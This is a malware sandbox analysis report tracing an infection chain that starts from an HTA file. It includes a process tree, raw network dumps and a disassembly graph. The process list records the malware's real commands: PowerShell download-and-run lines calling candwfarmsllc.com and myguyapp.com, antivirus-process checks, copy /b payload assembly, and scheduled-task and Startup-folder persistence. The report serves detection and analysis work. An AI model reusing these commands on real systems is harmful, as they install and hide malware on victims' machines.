                                                                                      2025-01-11 21:53:06 UTC16384INData Raw: f8 76 14 b3 04 a6 76 33 26 3d 09 48 06 25 6e ca e4 8e 13 3c 24 19 38 50 93 60 f1 74 43 43 7e 94 c6 27 d2 5b 37 25 f8 02 92 03 5d 93 de 13 0e ad 2e 53 06 e8 4b 44 90 a6 86 39 76 a1 3b 9a 07 f7 fd 3b f4 14 8b 29 b3 1f 28 d6 e8 1b 71 af 6b 9d 8a d4 94 45 19 ea 03 0f 86 13 09 05 32 24 ef f8 e0 39 45 79 80 9d eb 4a b0 1e 88 9d aa d6 cf f6 a3 d2 d0 e9 97 b0 ae 43 77 d1 70 58 a1 da 25 74 b1 8e 14 6b e7 d3 a3 89 16 d9 e1 82 1c 59 a0 16 14 fb c9 12 50 cb 02 23 11 dd 77 f9 75 1a 7f 2c 10 76 c4 d6 d5 ec 26 3a b4 4d 00 2d fd 3b 10 36 47 c5 b1 9f fd c6 d3 cd fb 64 f3 36 7e 4d f7 2a e9 e5 77 64 ad 39 50 ce 08 00 22 d1 f6 b3 85 45 20 c6 a6 68 f5 f6 12 3b d8 7f d6 8b 53 a2 d8 3b 82 51 8c 80 87 42 15 5e 0e 5f 4a 87 52 48 b1 8a 03 95 78 77 41 bf e8 8a b8 51 12 4a ef 8f 68
                                                                                      Data Ascii: vv3&=H%n<$8P`tCC~'[7%].SKD9v;;)(qkE2$9EyJCwpX%tkYP#wu,v&:M-;6Gd6~M*wd9P"E h;S;QB^_JRHxwAQJh
                                                                                      2025-01-11 21:53:06 UTC16384INData Raw: d9 42 5f 15 2f 8e f6 3d a9 36 5a 8a 51 11 41 f6 81 b2 98 e6 69 aa 77 3f b7 e6 78 96 1b 2c bb 79 ff cf a1 10 23 b8 18 ed eb 42 54 d5 45 de 7f b5 6c 6e eb 78 00 9a a5 17 d7 83 5d f4 33 1d 6c a0 36 7a 54 ef 3c 42 6b 95 58 7c 6d 1c d1 fd 8d 6d 41 8f ba b6 46 dd 97 90 7c d3 57 31 9d 8d 48 77 a1 31 51 31 d3 52 d8 15 39 44 ad 4e f2 3c 07 e6 03 8c 75 31 b2 01 be 33 85 ca 50 ab 84 61 ee 03 c3 dc 34 5b 5c 00 22 bc 09 79 e8 ce dd 8a 81 2e 88 33 11 59 9e f5 d6 62 5c d1 58 76 8b 6b cb 58 a1 47 bd 71 4f c7 2a 89 f3 f1 fe 0f 0a 67 72 f1 6b 1a b7 5e f9 4f 8c 84 c0 03 de 89 a4 d1 42 4d b8 f2 a8 26 22 eb 6f 76 3b ac c3 11 08 49 af e4 a4 0b 2b 8e b3 f1 1d 05 00 8b 56 ed 68 7e 0e dd 3a ea 60 ae d8 75 ff 3b f3 46 8a f7 02 e2 8f a9 c9 56 5f ac 8d 56 fc cc 1c d0 09 ca 70 ac c1
                                                                                      Data Ascii: B_/=6ZQAiw?x,y#BTElnx]3l6zT<BkX|mmAF|W1Hw1Q1R9DN<u13Pa4[\"y.3Yb\XvkXGqO*grk^OBM&"ov;I+Vh~:`u;FV_Vp


                                                                                      Statistics

                                                                                      CPU Usage

                                                                                      Click to jump to process

                                                                                      Memory Usage

                                                                                      Click to jump to process

                                                                                      High Level Behavior Distribution

                                                                                      Click to dive into process behavior distribution

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      General

                                                                                      Target ID:0
                                                                                      Start time:16:52:56
                                                                                      Start date:11/01/2025
                                                                                      Path:C:\Windows\SysWOW64\mshta.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:mshta.exe "C:\Users\user\Desktop\c2.hta"
                                                                                      Imagebase:0xb0000
                                                                                      File size:13'312 bytes
                                                                                      MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:2
                                                                                      Start time:16:52:57
                                                                                      Start date:11/01/2025
                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $url='https://candwfarmsllc.com/c2.bat'; $output=$env:TEMP + '\c2.bat'; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -NoNewWindow"
                                                                                      Imagebase:0x4f0000
                                                                                      File size:433'152 bytes
                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:3
                                                                                      Start time:16:52:57
                                                                                      Start date:11/01/2025
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:4
                                                                                      Start time:16:52:58
                                                                                      Start date:11/01/2025
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\c2.bat""
                                                                                      Imagebase:0x240000
                                                                                      File size:236'544 bytes
                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:5
                                                                                      Start time:16:52:59
                                                                                      Start date:11/01/2025
                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"
                                                                                      Imagebase:0x4f0000
                                                                                      File size:433'152 bytes
                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:6
                                                                                      Start time:16:53:01
                                                                                      Start date:11/01/2025
                                                                                      Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\W2.pdf"
                                                                                      Imagebase:0x7ff6bc1b0000
                                                                                      File size:5'641'176 bytes
                                                                                      MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:7
                                                                                      Start time:16:53:01
                                                                                      Start date:11/01/2025
                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"
                                                                                      Imagebase:0x4f0000
                                                                                      File size:433'152 bytes
                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:8
                                                                                      Start time:16:53:03
                                                                                      Start date:11/01/2025
                                                                                      Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                      Imagebase:0x7ff74bb60000
                                                                                      File size:3'581'912 bytes
                                                                                      MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:9
                                                                                      Start time:16:53:03
                                                                                      Start date:11/01/2025
                                                                                      Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2072 --field-trial-handle=1344,i,14857468376700330533,7466528391267394821,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                      Imagebase:0x7ff74bb60000
                                                                                      File size:3'581'912 bytes
                                                                                      MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:13
                                                                                      Start time:16:53:13
                                                                                      Start date:11/01/2025
                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"
                                                                                      Imagebase:0x4f0000
                                                                                      File size:433'152 bytes
                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:16
                                                                                      Start time:16:53:33
                                                                                      Start date:11/01/2025
                                                                                      Path:C:\Users\user\AppData\Local\Temp\msword\msword.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:msword.exe
                                                                                      Imagebase:0x400000
                                                                                      File size:597'659'152 bytes
                                                                                      MD5 hash:0DE162AA65BC5DAE2145333A0D1F8801
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Antivirus matches:
                                                                                      • Detection: 16%, ReversingLabs
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:17
                                                                                      Start time:16:53:35
                                                                                      Start date:11/01/2025
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /c move Nr Nr.cmd & Nr.cmd
                                                                                      Imagebase:0x240000
                                                                                      File size:236'544 bytes
                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:18
                                                                                      Start time:16:53:35
                                                                                      Start date:11/01/2025
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:19
                                                                                      Start time:16:53:36
                                                                                      Start date:11/01/2025
                                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:tasklist
                                                                                      Imagebase:0xb10000
                                                                                      File size:79'360 bytes
                                                                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:20
                                                                                      Start time:16:53:36
                                                                                      Start date:11/01/2025
                                                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:findstr /I "opssvc wrsa"
                                                                                      Imagebase:0xf10000
                                                                                      File size:29'696 bytes
                                                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:21
                                                                                      Start time:16:53:37
                                                                                      Start date:11/01/2025
                                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:tasklist
                                                                                      Imagebase:0xb10000
                                                                                      File size:79'360 bytes
                                                                                      MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:22
                                                                                      Start time:16:53:37
                                                                                      Start date:11/01/2025
                                                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                      Imagebase:0xf10000
                                                                                      File size:29'696 bytes
                                                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:23
                                                                                      Start time:16:53:38
                                                                                      Start date:11/01/2025
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:cmd /c md 361684
                                                                                      Imagebase:0x240000
                                                                                      File size:236'544 bytes
                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:24
                                                                                      Start time:16:53:38
                                                                                      Start date:11/01/2025
                                                                                      Path:C:\Windows\SysWOW64\extrac32.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:extrac32 /Y /E Approaches
                                                                                      Imagebase:0x80000
                                                                                      File size:29'184 bytes
                                                                                      MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:25
                                                                                      Start time:16:53:38
                                                                                      Start date:11/01/2025
                                                                                      Path:C:\Windows\SysWOW64\findstr.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:findstr /V "Korea" Measurement
                                                                                      Imagebase:0xf10000
                                                                                      File size:29'696 bytes
                                                                                      MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:26
                                                                                      Start time:16:53:38
                                                                                      Start date:11/01/2025
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:cmd /c copy /b 361684\Propose.com + Different + Constitute + Instantly + Led + Indonesia + Dressing + Missed + Brian + Clinton + Protocol 361684\Propose.com
                                                                                      Imagebase:0x240000
                                                                                      File size:236'544 bytes
                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:27
                                                                                      Start time:16:53:38
                                                                                      Start date:11/01/2025
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:cmd /c copy /b ..\Next + ..\Math + ..\Blocked + ..\Leisure + ..\Substantial + ..\Beam + ..\Cocks + ..\David + ..\Undefined + ..\Realm U
                                                                                      Imagebase:0x240000
                                                                                      File size:236'544 bytes
                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:28
                                                                                      Start time:16:53:38
                                                                                      Start date:11/01/2025
                                                                                      Path:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:Propose.com U
                                                                                      Imagebase:0x3b0000
                                                                                      File size:947'288 bytes
                                                                                      MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Antivirus matches:
                                                                                      • Detection: 0%, ReversingLabs
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:29
                                                                                      Start time:16:53:38
                                                                                      Start date:11/01/2025
                                                                                      Path:C:\Windows\SysWOW64\choice.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:choice /d y /t 5
                                                                                      Imagebase:0xac0000
                                                                                      File size:28'160 bytes
                                                                                      MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:30
                                                                                      Start time:16:53:39
                                                                                      Start date:11/01/2025
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:cmd /c schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
                                                                                      Imagebase:0x240000
                                                                                      File size:236'544 bytes
                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:31
                                                                                      Start time:16:53:39
                                                                                      Start date:11/01/2025
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:32
                                                                                      Start time:16:53:39
                                                                                      Start date:11/01/2025
                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
                                                                                      Imagebase:0x640000
                                                                                      File size:187'904 bytes
                                                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:33
                                                                                      Start time:16:53:40
                                                                                      Start date:11/01/2025
                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & echo URL="C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & exit
                                                                                      Imagebase:0x240000
                                                                                      File size:236'544 bytes
                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:34
                                                                                      Start time:16:53:40
                                                                                      Start date:11/01/2025
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:35
                                                                                      Start time:16:53:40
                                                                                      Start date:11/01/2025
                                                                                      Path:C:\Windows\System32\wscript.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js"
                                                                                      Imagebase:0x7ff625570000
                                                                                      File size:170'496 bytes
                                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:36
                                                                                      Start time:16:53:41
                                                                                      Start date:11/01/2025
                                                                                      Path:C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"
                                                                                      Imagebase:0x200000
                                                                                      File size:947'288 bytes
                                                                                      MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Antivirus matches:
                                                                                      • Detection: 0%, ReversingLabs
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:37
                                                                                      Start time:16:53:50
                                                                                      Start date:11/01/2025
                                                                                      Path:C:\Windows\System32\wscript.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js"
                                                                                      Imagebase:0x7ff625570000
                                                                                      File size:170'496 bytes
                                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:38
                                                                                      Start time:16:53:51
                                                                                      Start date:11/01/2025
                                                                                      Path:C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y"
                                                                                      Imagebase:0xed0000
                                                                                      File size:947'288 bytes
                                                                                      MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Disassembly

                                                                                      Reset < >

                                                                                        Execution Graph

                                                                                        Execution Coverage:2.6%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:12%
                                                                                        Total number of Nodes:25
                                                                                        Total number of Limit Nodes:0
                                                                                        execution_graph 8599 4817fa0 8600 4817fcf 8599->8600 8601 481812e 8600->8601 8603 4818a0a 8600->8603 8604 4818a21 8603->8604 8605 4818a29 8603->8605 8604->8601 8609 48190ef 8605->8609 8613 4818a48 8605->8613 8619 4818a38 8605->8619 8610 48190be 8609->8610 8625 4817e98 8610->8625 8614 4818a72 8613->8614 8629 4817e8c 8614->8629 8616 4817e98 ResumeThread 8617 48190d7 8616->8617 8618 481901e 8618->8616 8622 4818a48 8619->8622 8620 4817e8c CreateProcessW 8624 481901e 8620->8624 8621 4817e98 ResumeThread 8623 48190d7 8621->8623 8622->8620 8624->8621 8626 48198e8 ResumeThread 8625->8626 8628 48190d7 8626->8628 8630 4819518 CreateProcessW 8629->8630 8632 48197c7 8630->8632

                                                                                        Executed Functions

                                                                                        Function 04818A48 Relevance: 4.2, Strings: 3, Instructions: 481COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 0 4818a48-4818aa3 5 4818aa5-4818aab 0->5 6 4818aad 0->6 7 4818ab0-4818ab4 5->7 6->7 8 4818ab6-4818abc 7->8 9 4818abe 7->9 10 4818ac1-4818ace 8->10 9->10 12 4818ad0-4818b1a 10->12 13 4818b1c-4818b5c call 4817e74 10->13 21 4818b64-4818b68 12->21 13->21 23 4818bb6-4818bf6 call 4817e74 21->23 24 4818b6a-4818bb4 21->24 33 4818bfe-4818c02 23->33 24->33 35 4818c50-4818c99 call 4817e74 33->35 36 4818c04-4818c4e 33->36 45 4818ca1-4818cb1 35->45 36->45 47 4818cb3-4818cb8 45->47 48 4818cba-4818cc8 45->48 49 4818cef-4818d04 47->49 48->49 50 4818cca 48->50 57 4818d87-4818d8b 49->57 58 4818d0a-4818d20 49->58 52 4818cd1-4818cd7 50->52 53 4818ce1-4818ce7 50->53 54 4818ce9 50->54 55 4818cd9-4818cdf 50->55 52->49 53->49 54->49 55->49 59 4818d91-4818d9a 57->59 60 4818fba-4818fee 57->60 58->57 61 4818d22-4818d30 58->61 62 4818da3-4818dac 59->62 63 4818d9c 59->63 85 4818ff0-4818ff6 60->85 86 4818ff8 60->86 68 4818d40-4818d84 61->68 69 4818d32-4818d39 61->69 64 4818dba-4818dc5 62->64 65 4818dae-4818db8 62->65 63->62 74 4818dc7-4818dce 64->74 65->74 68->57 69->68 76 4818dd0-4818dd6 74->76 77 4818dd8 74->77 78 4818ddb-4818ddf 76->78 77->78 80 4818de1-4818ded 78->80 81 4818def-4818df2 78->81 83 4818df8-4818dfc 80->83 81->83 87 4818e06 83->87 88 4818dfe-4818e04 83->88 89 4818ffb-4819020 call 4817e8c 85->89 86->89 90 4818e09-4818e2a call 4817e80 87->90 88->90 96 4819026-48190b7 89->96 97 48190be-48190d2 call 4817e98 89->97 98 4818e30-4818e42 90->98 99 4818f8c-4818fad 90->99 96->97 108 48190d7-4819116 97->108 106 4818e44-4818e56 98->106 107 4818e5b-4818e61 98->107 110 4818fb7-4818fb8 99->110 111 4818faf 99->111 126 4818f34-4818f39 106->126 112 4818e63-4818ed3 107->112 113 4818ed5-4818f32 107->113 129 4819120-4819144 108->129 130 4819118 108->130 110->60 111->110 112->126 113->126 127 4818f85 126->127 128 4818f3b-4818f83 126->128 127->99 128->127 145 4819145 129->145 130->129 145->145
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.1693044344.0000000004810000.00000040.00000800.00020000.00000000.sdmp, Offset: 04810000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_4810000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4Ldq$4Ldq$4Ldq
                                                                                        • API String ID: 0-2966122151
                                                                                        • Opcode ID: 726b49d80d61badc2f4ebc5cb11c45b34c58c086bad7e6d883b94d5a14243362
                                                                                        • Instruction ID: 27e6eb897c56462e87470427575a0a32a03b12371266fcd215bd94402ecb81f8
                                                                                        • Opcode Fuzzy Hash: 726b49d80d61badc2f4ebc5cb11c45b34c58c086bad7e6d883b94d5a14243362
                                                                                        • Instruction Fuzzy Hash: A812C070A003188FDB14DFA4C895BADBBF6BF88304F1489A9D50A9B3A1DB75AC44CF51
                                                                                        Function 04817E8C Relevance: 1.8, APIs: 1, Instructions: 284processCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
